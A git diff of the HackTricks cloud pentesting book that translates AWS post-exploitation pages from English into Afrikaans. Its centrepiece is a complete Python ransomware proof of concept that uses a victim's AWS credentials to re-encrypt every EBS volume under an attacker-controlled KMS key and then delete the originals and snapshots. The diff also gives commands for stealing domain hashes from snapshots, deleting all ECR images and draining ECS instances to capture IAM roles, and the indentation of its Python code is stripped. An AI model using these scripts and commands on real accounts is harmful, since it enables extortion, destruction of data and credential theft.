+"kms:CancelKeyDeletion" +], +"Resource": "*" +}, +{ +"Sid": "Allow use of the key", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*" +}, +{ +"Sid": "Allow attachment of persistent resources", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" +}, +"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], +"Resource": "*", +"Condition": { +"Bool": { +"kms:GrantIsForAWSResource": "true" +} +} +} +] } ``` - -Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume. +Wag 'n oomblik vir die nuut ingestelde sleutelbeleid om te versprei. Keer dan terug na die 'slagoffer' rekening en probeer om een van die nuut versleutelde EBS volumes aan te sluit. Jy sal vind dat jy die volume kan aanheg. ![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4) -But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it. +Maar wanneer jy probeer om die EC2 instansie weer op te start met die versleutelde EBS volume, sal dit net misluk en van die 'pending' toestand teruggaan na die 'stopped' toestand vir altyd, aangesien die aangehegte EBS volume nie ontsleutel kan word met die sleutel nie, omdat die sleutelbeleid dit nie meer toelaat nie. 
![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0) -This the python script used. It takes AWS creds for a 'victim' account and a publicly available AWS ARN value for the key to be used for encryption. The script will make encrypted copies of ALL available EBS volumes attached to ALL EC2 instances in the targeted AWS account, then stop every EC2 instance, detach the original EBS volumes, delete them, and finally delete all the snapshots utilized during the process. This will leave only encrypted EBS volumes in the targeted 'victim' account. ONLY USE THIS SCRIPT IN A TEST ENVIRONMENT, IT IS DESTRUCTIVE AND WILL DELETE ALL THE ORIGINAL EBS VOLUMES. You can recover them using the utilized KMS key and restore them to their original state via snapshots, but just want to make you aware that this is a ransomware PoC at the end of the day. - +Dit is die python skrip wat gebruik word. Dit neem AWS krediete vir 'n 'slagoffer' rekening en 'n publiek beskikbare AWS ARN waarde vir die sleutel wat gebruik gaan word vir versleuteling. Die skrip sal versleutelde kopieĂ« van ALLE beskikbare EBS volumes wat aan ALLE EC2 instansies in die geteikende AWS rekening geheg is, maak, dan elke EC2 instansie stop, die oorspronklike EBS volumes ontkoppel, hulle verwyder, en uiteindelik al die snappings wat tydens die proses gebruik is, verwyder. Dit sal slegs versleutelde EBS volumes in die geteikende 'slagoffer' rekening agterlaat. GEBRUIK DIT SLEGS IN 'N TOETSOMGEWING, DIT IS DESTRUKTIEF EN SAL AL DIE ORIGINELE EBS VOLUMES VERWYDER. Jy kan hulle herstel met die gebruikte KMS sleutel en hulle na hul oorspronklike toestand herstel via snappings, maar ek wil jou net bewus maak dat dit 'n ransomware PoC aan die einde van die dag is. 
``` import boto3 import argparse from botocore.exceptions import ClientError def enumerate_ec2_instances(ec2_client): - instances = ec2_client.describe_instances() - instance_volumes = {} - for reservation in instances['Reservations']: - for instance in reservation['Instances']: - instance_id = instance['InstanceId'] - volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] - instance_volumes[instance_id] = volumes - return instance_volumes +instances = ec2_client.describe_instances() +instance_volumes = {} +for reservation in instances['Reservations']: +for instance in reservation['Instances']: +instance_id = instance['InstanceId'] +volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol] +instance_volumes[instance_id] = volumes +return instance_volumes def snapshot_volumes(ec2_client, volumes): - snapshot_ids = [] - for volume_id in volumes: - snapshot = ec2_client.create_snapshot(VolumeId=volume_id) - snapshot_ids.append(snapshot['SnapshotId']) - return snapshot_ids +snapshot_ids = [] +for volume_id in volumes: +snapshot = ec2_client.create_snapshot(VolumeId=volume_id) +snapshot_ids.append(snapshot['SnapshotId']) +return snapshot_ids def wait_for_snapshots(ec2_client, snapshot_ids): - for snapshot_id in snapshot_ids: - ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) +for snapshot_id in snapshot_ids: +ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id]) def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn): - new_volume_ids = [] - for snapshot_id in snapshot_ids: - snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] - volume_id = snapshot_info['VolumeId'] - volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] - availability_zone = volume_info['AvailabilityZone'] +new_volume_ids = [] +for snapshot_id in snapshot_ids: +snapshot_info = 
ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0] +volume_id = snapshot_info['VolumeId'] +volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0] +availability_zone = volume_info['AvailabilityZone'] - volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, - Encrypted=True, KmsKeyId=kms_key_arn) - new_volume_ids.append(volume['VolumeId']) - return new_volume_ids +volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone, +Encrypted=True, KmsKeyId=kms_key_arn) +new_volume_ids.append(volume['VolumeId']) +return new_volume_ids def stop_instances(ec2_client, instance_ids): - for instance_id in instance_ids: - try: - instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) - instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] +for instance_id in instance_ids: +try: +instance_description = ec2_client.describe_instances(InstanceIds=[instance_id]) +instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name'] - if instance_state == 'running': - ec2_client.stop_instances(InstanceIds=[instance_id]) - print(f"Stopping instance: {instance_id}") - ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) - print(f"Instance {instance_id} stopped.") - else: - print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") +if instance_state == 'running': +ec2_client.stop_instances(InstanceIds=[instance_id]) +print(f"Stopping instance: {instance_id}") +ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id]) +print(f"Instance {instance_id} stopped.") +else: +print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).") - except ClientError as e: - print(f"Error stopping instance {instance_id}: {e}") +except ClientError as e: +print(f"Error 
stopping instance {instance_id}: {e}") def detach_and_delete_volumes(ec2_client, volumes): - for volume_id in volumes: - try: - ec2_client.detach_volume(VolumeId=volume_id) - ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) - ec2_client.delete_volume(VolumeId=volume_id) - print(f"Deleted volume: {volume_id}") - except ClientError as e: - print(f"Error detaching or deleting volume {volume_id}: {e}") +for volume_id in volumes: +try: +ec2_client.detach_volume(VolumeId=volume_id) +ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id]) +ec2_client.delete_volume(VolumeId=volume_id) +print(f"Deleted volume: {volume_id}") +except ClientError as e: +print(f"Error detaching or deleting volume {volume_id}: {e}") def delete_snapshots(ec2_client, snapshot_ids): - for snapshot_id in snapshot_ids: - try: - ec2_client.delete_snapshot(SnapshotId=snapshot_id) - print(f"Deleted snapshot: {snapshot_id}") - except ClientError as e: - print(f"Error deleting snapshot {snapshot_id}: {e}") +for snapshot_id in snapshot_ids: +try: +ec2_client.delete_snapshot(SnapshotId=snapshot_id) +print(f"Deleted snapshot: {snapshot_id}") +except ClientError as e: +print(f"Error deleting snapshot {snapshot_id}: {e}") def replace_volumes(ec2_client, instance_volumes): - instance_ids = list(instance_volumes.keys()) - stop_instances(ec2_client, instance_ids) +instance_ids = list(instance_volumes.keys()) +stop_instances(ec2_client, instance_ids) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - detach_and_delete_volumes(ec2_client, all_volumes) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +detach_and_delete_volumes(ec2_client, all_volumes) def ebs_lock(access_key, secret_key, region, kms_key_arn): - ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) +ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, 
region_name=region) - instance_volumes = enumerate_ec2_instances(ec2_client) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - snapshot_ids = snapshot_volumes(ec2_client, all_volumes) - wait_for_snapshots(ec2_client, snapshot_ids) - create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached - replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes - delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed +instance_volumes = enumerate_ec2_instances(ec2_client) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +snapshot_ids = snapshot_volumes(ec2_client, all_volumes) +wait_for_snapshots(ec2_client, snapshot_ids) +create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn) # New encrypted volumes are created but not attached +replace_volumes(ec2_client, instance_volumes) # Stops instances, detaches and deletes old volumes +delete_snapshots(ec2_client, snapshot_ids) # Optionally delete snapshots if no longer needed def parse_arguments(): - parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool') - parser.add_argument('--access-key', required=True, help='AWS Access Key ID') - parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') - parser.add_argument('--region', required=True, help='AWS Region') - parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption') - return parser.parse_args() +parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool') +parser.add_argument('--access-key', required=True, help='AWS Access Key ID') +parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key') +parser.add_argument('--region', required=True, help='AWS Region') +parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume 
encryption') +return parser.parse_args() def main(): - args = parse_arguments() - ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) +args = parse_arguments() +ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region) - instance_volumes = enumerate_ec2_instances(ec2_client) - all_volumes = [vol for vols in instance_volumes.values() for vol in vols] - snapshot_ids = snapshot_volumes(ec2_client, all_volumes) - wait_for_snapshots(ec2_client, snapshot_ids) - create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) - replace_volumes(ec2_client, instance_volumes) - delete_snapshots(ec2_client, snapshot_ids) +instance_volumes = enumerate_ec2_instances(ec2_client) +all_volumes = [vol for vols in instance_volumes.values() for vol in vols] +snapshot_ids = snapshot_volumes(ec2_client, all_volumes) +wait_for_snapshots(ec2_client, snapshot_ids) +create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn) +replace_volumes(ec2_client, instance_volumes) +delete_snapshots(ec2_client, snapshot_ids) if __name__ == "__main__": - main() +main() ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md index 7a9a19cc4..075784d07 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md 
@@ -2,8 +2,7 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Checking a snapshot locally - +## Kontroleer 'n snapshot plaaslik ```bash # Install dependencies pip install 'dsnap[cli]' @@ -32,10 +31,8 @@ cd dsnap make docker/build IMAGE=".img" make docker/run #With the snapshot downloaded ``` - > [!CAUTION] -> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: - +> **Let wel** dat `dsnap` jou nie sal toelaat om openbare snappings af te laai nie. Om dit te omseil, kan jy 'n kopie van die snapshot in jou persoonlike rekening maak, en dit aflaai: ```bash # Copy the snapshot aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57" 
@@ -49,59 +46,55 @@ dsnap --region us-east-2 get snap-027da41be451109da # Delete the snapshot after downloading aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2 ``` +Vir meer inligting oor hierdie tegniek, kyk na die oorspronklike navorsing in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) -For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) - -You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) - -## Checking a snapshot in AWS +Jy kan dit met Pacu doen deur die module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) te gebruik. +## Kontroleer 'n snapshot in AWS ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 ``` +**Monteer dit in 'n EC2 VM onder jou beheer** (dit moet in dieselfde streek wees as die kopie van die rugsteun): -**Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): +Stap 1: 'n Nuwe volume van jou verkiesde grootte en tipe moet geskep word deur na EC2 –> Volumes te gaan. -Step 1: A new volume of your preferred size and type is to be created by heading over to EC2 –> Volumes. +Om hierdie aksie uit te voer, volg hierdie opdragte: -To be able to perform this action, follow these commands: +- Skep 'n EBS-volume om aan die EC2-instantie te koppel. +- Verseker dat die EBS-volume en die instantie in dieselfde sone is. -- Create an EBS volume to attach to the EC2 instance. -- Ensure that the EBS volume and the instance are in the same zone. 
+Stap 2: Die "koppel volume" opsie moet gekies word deur regs te klik op die geskepte volume. -Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. +Stap 3: Die instantie uit die instantie teksvak moet gekies word. -Step 3: The instance from the instance text box is to be selected. +Om hierdie aksie uit te voer, gebruik die volgende opdrag: -To be able to perform this action, use the following command: +- Koppel die EBS-volume. -- Attach the EBS volume. +Stap 4: Teken in op die EC2-instantie en lys die beskikbare skywe met die opdrag `lsblk`. -Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. +Stap 5: Kontroleer of die volume enige data het met die opdrag `sudo file -s /dev/xvdf`. -Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`. +As die uitvoer van die bogenoemde opdrag "/dev/xvdf: data" toon, beteken dit dat die volume leeg is. -If the output of the above command shows "/dev/xvdf: data", it means the volume is empty. +Stap 6: Formateer die volume na die ext4 lĂȘerstelsel met die opdrag `sudo mkfs -t ext4 /dev/xvdf`. Alternatiewelik kan jy ook die xfs-formaat gebruik deur die opdrag `sudo mkfs -t xfs /dev/xvdf` te gebruik. Neem asseblief kennis dat jy of ext4 of xfs moet gebruik. -Step 6: Format the volume to the ext4 filesystem using the command `sudo mkfs -t ext4 /dev/xvdf`. Alternatively, you can also use the xfs format by using the command `sudo mkfs -t xfs /dev/xvdf`. Please note that you should use either ext4 or xfs. +Stap 7: Skep 'n gids van jou keuse om die nuwe ext4-volume te monteer. Byvoorbeeld, jy kan die naam "newvolume" gebruik. -Step 7: Create a directory of your choice to mount the new ext4 volume. For example, you can use the name "newvolume". +Om hierdie aksie uit te voer, gebruik die opdrag `sudo mkdir /newvolume`. -To be able to perform this action, use the command `sudo mkdir /newvolume`. 
+Stap 8: Monteer die volume na die "newvolume" gids met die opdrag `sudo mount /dev/xvdf /newvolume/`. -Step 8: Mount the volume to the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`. +Stap 9: Verander gids na die "newvolume" gids en kontroleer die skyfspasie om die volume-montage te valideer. -Step 9: Change directory to the "newvolume" directory and check the disk space to validate the volume mount. +Om hierdie aksie uit te voer, gebruik die volgende opdragte: -To be able to perform this action, use the following commands: +- Verander gids na `/newvolume`. +- Kontroleer die skyfspasie met die opdrag `df -h .`. Die uitvoer van hierdie opdrag moet die vrye spasie in die "newvolume" gids toon. -- Change directory to `/newvolume`. -- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. - -You can do this with Pacu using the module `ebs__explore_snapshots`. - -## Checking a snapshot in AWS (using cli) +Jy kan dit met Pacu doen deur die module `ebs__explore_snapshots` te gebruik. +## Kontroleer 'n snapshot in AWS (met cli) ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id 
@@ -127,19 +120,14 @@ sudo mount /dev/xvdh1 /mnt ls /mnt ``` - ## Shadow Copy -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. +Enige AWS-gebruiker wat die **`EC2:CreateSnapshot`** toestemming het, kan die hashes van alle domein gebruikers steel deur 'n **snapshot van die Domeinbeheerder** te skep, dit aan 'n instansie wat hulle beheer te koppel en die **NTDS.dit en SYSTEM** registrasie hives lĂȘer te **eksporteer** vir gebruik met Impacket se secretsdump projek. -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. +Jy kan hierdie hulpmiddel gebruik om die aanval te outomatiseer: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) of jy kan een van die vorige tegnieke gebruik nadat jy 'n snapshot geskep het. ## References - [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md index eb3b5f33f..63ad1afc6 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md 
@@ -2,18 +2,14 @@ {{#include ../../../../banners/hacktricks-training.md}} -**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** +**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **vir verdere besonderhede van die aanval!** -Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. +Passiewe netwerkinspeksie in 'n wolkomgewing was **uitdagend**, wat groot konfigurasiewijzigings vereis het om netwerkverkeer te monitor. 'n Nuwe kenmerk genaamd “**VPC Traffic Mirroring**” is egter deur AWS bekendgestel om hierdie proses te vereenvoudig. Met VPC Traffic Mirroring kan netwerkverkeer binne VPC's **gedupliseer** word sonder om enige sagteware op die instansies self te installeer. Hierdie gedupliseerde verkeer kan na 'n netwerkindringingsdeteksiesisteem (IDS) gestuur word vir **analise**. -To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. 
+Om die behoefte aan **geoutomatiseerde ontplooiing** van die nodige infrastruktuur vir spieĂ«ling en ekfiltrering van VPC-verkeer aan te spreek, het ons 'n bewys-van-konsep-skrip genaamd “**malmirror**” ontwikkel. Hierdie skrip kan gebruik word met **gekompromitteerde AWS-akkrediteer** om spieĂ«ling op te stel vir alle ondersteunde EC2-instanties in 'n teiken VPC. Dit is belangrik om te noem dat VPC Traffic Mirroring slegs ondersteun word deur EC2-instanties wat deur die AWS Nitro-stelsel aangedryf word, en die VPC-spieĂ«lteiken moet binne dieselfde VPC wees as die gespieĂ«lde gasheer. -The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. +Die **impak** van kwaadwillige VPC-verkeer spieĂ«ling kan beduidend wees, aangesien dit aanvallers toelaat om toegang te verkry tot **sensitiewe inligting** wat binne VPC's oorgedra word. Die **waarskynlikheid** van sulke kwaadwillige spieĂ«ling is hoog, gegewe die teenwoordigheid van **duidelike teksverkeer** wat deur VPC's vloei. Baie maatskappye gebruik duidelike teksprotokolle binne hul interne netwerke vir **prestasie redes**, met die aanname dat tradisionele man-in-the-middle-aanvalle nie moontlik is nie. -For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. 
+Vir meer inligting en toegang tot die [**malmirror skrip**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), kan dit op ons **GitHub-bewaarplek** gevind word. Die skrip outomatiseer en stroomlyn die proses, wat dit **vinning, eenvoudig en herhaalbaar** maak vir offensiewe navorsingsdoeleindes. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md index a971ea769..948664aad 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md @@ -4,14 +4,13 @@ ## ECR -For more information check +Vir meer inligting, kyk {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Login, Pull & Push - +### Teken in, Trek & Stoot ```bash # Docker login into ecr ## For public repo (always use us-east-1) 
@@ -38,17 +37,16 @@ docker push .dkr.ecr..amazonaws.com/purplepanda:latest # Downloading without Docker # List digests aws ecr batch-get-image --repository-name level2 \ - --registry-id 653711331788 \ - --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' +--registry-id 653711331788 \ +--image-ids imageTag=latest | jq '.images[].imageManifest | fromjson' ## Download a digest aws ecr get-download-url-for-layer \ - --repository-name level2 \ - --registry-id 653711331788 \ - --layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" +--repository-name level2 \ +--registry-id 653711331788 \ +--layer-digest "sha256:edfaad38ac10904ee76c81e343abf88f22e6cfc7413ab5a8e4aeffc6a7d9087a" ``` - -After downloading the images you should **check them for sensitive info**: +Na die aflaai van die beelde moet jy **hulle vir sensitiewe inligting nagaan**: {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics 
@@ -56,25 +54,24 @@ https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-m ### `ecr:PutLifecyclePolicy` | `ecr:DeleteRepository` | `ecr-public:DeleteRepository` | `ecr:BatchDeleteImage` | `ecr-public:BatchDeleteImage` -An attacker with any of these permissions can **create or modify a lifecycle policy to delete all images in the repository** and then **delete the entire ECR repository**. This would result in the loss of all container images stored in the repository. - +'n Aanvaller met enige van hierdie toestemmings kan **'n lewensiklusbeleid skep of wysig om alle beelde in die repository te verwyder** en dan **die hele ECR-repository te verwyder**. Dit sal lei tot die verlies van alle houerbeelde wat in die repository gestoor is. ```bash bashCopy code# Create a JSON file with the malicious lifecycle policy echo '{ - "rules": [ - { - "rulePriority": 1, - "description": "Delete all images", - "selection": { - "tagStatus": "any", - "countType": "imageCountMoreThan", - "countNumber": 0 - }, - "action": { - "type": "expire" - } - } - ] +"rules": [ +{ +"rulePriority": 1, +"description": "Delete all images", +"selection": { +"tagStatus": "any", +"countType": "imageCountMoreThan", +"countNumber": 0 +}, +"action": { +"type": "expire" +} +} +] }' > malicious_policy.json # Apply the malicious lifecycle policy to the ECR repository @@ -92,9 +89,4 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag # Delete multiple images from the ECR public repository aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md index 1d2fd80a5..534beb164 100644 
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md @@ -4,7 +4,7 @@ ## ECS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ecs-enum.md 
@@ -12,42 +12,37 @@ For more information check: ### Host IAM Roles -In ECS an **IAM role can be assigned to the task** running inside the container. **If** the task is run inside an **EC2** instance, the **EC2 instance** will have **another IAM** role attached to it.\ -Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check: +In ECS kan 'n **IAM rol aan die taak** toegeken word wat binne die houer loop. **As** die taak binne 'n **EC2** instance loop, sal die **EC2 instance** 'n **ander IAM** rol aan hom geheg hĂȘ.\ +Dit beteken dat as jy daarin slaag om 'n **kompromie** van 'n ECS instance te maak, jy potensieel die **IAM rol wat aan die ECR en aan die EC2 instance** gekoppel is, kan **verkry**. Vir meer inligting oor hoe om daardie akrediteer te verkry, kyk: {{#ref}} https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf {{#endref}} > [!CAUTION] -> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance. +> Let daarop dat as die EC2 instance IMDSv2 afdwing, [**volgens die dokumentasie**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), die **antwoord van die PUT versoek** 'n **hop limiet van 1** sal hĂȘ, wat dit onmoontlik maak om toegang tot die EC2 metadata vanaf 'n houer binne die EC2 instance te verkry. 
### Privesc to node to steal other containers creds & secrets -But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached. +Maar verder, gebruik EC2 docker om ECs take te laat loop, so as jy kan ontsnap na die node of **toegang tot die docker socket** kan kry, kan jy **kontroleer** watter **ander houers** aan die gang is, en selfs **binne hulle gaan** en **hulle IAM rolle** steel. #### Making containers run in current host -Furthermore, the **EC2 instance role** will usually have enough **permissions** to **update the container instance state** of the EC2 instances being used as nodes inside the cluster. An attacker could modify the **state of an instance to DRAINING**, then ECS will **remove all the tasks from it** and the ones being run as **REPLICA** will be **run in a different instance,** potentially inside the **attackers instance** so he can **steal their IAM roles** and potential sensitive info from inside the container. - +Boonop sal die **EC2 instance rol** gewoonlik genoeg **toestemmings** hĂȘ om die **toestand van die houer instance** van die EC2 instances wat as nodes binne die kluster gebruik word, te **opdateer**. 'n Aanvaller kan die **toestand van 'n instance na DRAINING** verander, dan sal ECS **alle take daarvan verwyder** en diegene wat as **REPLICA** loop, sal in 'n ander instance **loop**, potensieel binne die **aanvaller se instance** sodat hy **hulle IAM rolle** en potensieel sensitiewe inligting van binne die houer kan **steel**. ```bash aws ecs update-container-instances-state \ - --cluster --status DRAINING --container-instances +--cluster --status DRAINING --container-instances ``` - -The same technique can be done by **deregistering the EC2 instance from the cluster**. 
